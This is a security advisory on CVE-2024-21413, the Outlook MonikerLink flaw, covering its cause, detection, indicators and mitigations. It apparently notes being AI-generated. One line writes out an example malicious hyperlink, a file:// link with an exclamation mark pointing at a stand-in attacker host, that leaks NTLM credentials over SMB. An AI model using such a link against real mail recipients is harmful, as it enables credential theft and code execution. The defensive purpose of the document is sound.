CVE-2024-21413 Overview
CVE-2024-21413 is a remote code execution vulnerability in Microsoft Outlook tracked as the MonikerLink bug. The flaw stems from improper input validation [CWE-20] when Outlook parses specially crafted hyperlinks containing the file:// protocol with an exclamation mark. Attackers can bypass Outlook's Protected View and the Office Protected View mode by manipulating moniker links, causing Outlook to load remote payloads through COM. Successful exploitation can leak local NTLM credentials and enable arbitrary code execution in the context of the user. The vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, and a public proof-of-concept is available.
Critical Impact
Attackers can execute arbitrary code and steal NTLM hashes from Outlook users by sending a crafted email containing a malicious MonikerLink, without requiring user interaction beyond previewing the message.
Affected Products
- Microsoft 365 Apps for Enterprise
- Microsoft Office 2016 (x86 and x64)
- Microsoft Office 2019 (x86 and x64)
- Microsoft Office Long Term Servicing Channel (LTSC) 2021
Discovery Timeline
- 2024-02-13 - CVE-2024-21413 published to NVD
- 2025-10-28 - Last updated in NVD database
Technical Details for CVE-2024-21413
Vulnerability Analysis
The vulnerability resides in how Outlook parses hyperlinks that reference the Component Object Model (COM) moniker subsystem. Crafted file:// URIs containing an exclamation mark cause Outlook to invoke MkParseDisplayName and load the referenced resource through a registered COM handler instead of treating it as an untrusted file path. This bypasses the Protected View sandbox that Microsoft Office normally enforces for content originating from email. The exploitation flow described by Check Point Research triggers SMB authentication to an attacker-controlled host, leaking the Net-NTLMv2 hash of the victim. The same primitive can launch other COM-registered applications such as Microsoft Word in editing mode, expanding the attack surface to additional document-parsing vulnerabilities. The bug is reachable from the Outlook preview pane in some configurations, removing the need for the user to explicitly click the link.
Root Cause
The root cause is improper input validation of the URL parsing routine that handles hyperlinks in Outlook messages. Outlook fails to sanitize the ! character in file:// URIs, allowing the value to be interpreted as a composite moniker by the underlying COM API instead of a path string.
Attack Vector
The attack vector is network-based. An attacker sends an email containing a hyperlink such as <a href="file:///\\attacker.tld\share\file.rtf!something">click</a>. When Outlook processes the message, the embedded moniker forces a remote resource load over SMB or WebDAV, resulting in credential disclosure and potential code execution through chained Office handlers. See the Check Point Analysis on MonikerLink Bug and the public proof-of-concept repository for technical details.
Detection Methods for CVE-2024-21413
Indicators of Compromise
- Inbound emails containing hyperlinks with file:// URIs that include an exclamation mark followed by additional path data.
- Outbound SMB (TCP/445) or WebDAV connections originating from OUTLOOK.EXE to untrusted external hosts immediately after email retrieval.
- Unexpected child processes spawned by OUTLOOK.EXE, including WINWORD.EXE, rundll32.exe, or scripting hosts loading remote content.
- NTLM authentication events directed at external IP addresses sourced from end-user workstations.
Detection Strategies
- Inspect mail flow at the gateway for HTML or plain-text hyperlinks containing the pattern file://.*! and quarantine matching messages.
- Hunt endpoint telemetry for OUTLOOK.EXE invoking MkParseDisplayName followed by network egress to non-corporate destinations.
- Correlate process-create events where Outlook is the parent of an Office or scripting binary with the loaded command line referencing a UNC path.
Monitoring Recommendations
- Enable PowerShell and Office telemetry logging through Microsoft Defender for Endpoint or equivalent EDR to capture COM activation events.
- Forward authentication logs to a SIEM and alert on NTLM challenges from internal workstations to external IP space.
- Review Outlook crash and Application logs for anomalous moniker-handling errors that may indicate exploitation attempts.
How to Mitigate CVE-2024-21413
Immediate Actions Required
- Apply the February 2024 Microsoft Patch Tuesday updates for Microsoft 365 Apps, Office 2016, Office 2019, and Office LTSC 2021 immediately.
- Block outbound SMB (TCP/445) and WebDAV traffic from user workstations to the public internet at the perimeter firewall.
- Enforce SMB signing and disable NTLM authentication to external destinations to limit credential theft impact.
- Prioritize remediation given the CISA KEV listing and the publicly available proof-of-concept exploit.
Patch Information
Microsoft released fixes on February 13, 2024. Refer to the Microsoft CVE-2024-21413 Update guidance for the exact build numbers per channel. Administrators can also apply the Vicarius Mitigation Script for CVE-2024-21413 and validate exposure using the Vicarius Detection Script.
Workarounds
- Configure Group Policy to disable the Outlook preview pane until patches are deployed enterprise-wide.
- Restrict outbound SMB and WebDAV at the network edge to prevent credential relay and remote payload loading.
- Use Microsoft Defender Attack Surface Reduction rules to block Office applications from creating child processes.
- Train users to avoid clicking unsolicited links and report suspicious messages containing file:// URIs to the security team.
# Configuration example: block outbound SMB on Windows endpoints
New-NetFirewallRule -DisplayName "Block Outbound SMB 445" `
-Direction Outbound -Protocol TCP -RemotePort 445 `
-Action Block -Profile Any
# Disable NTLM authentication to remote servers via Group Policy
# Computer Configuration > Windows Settings > Security Settings >
# Local Policies > Security Options >
# "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = Deny all
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
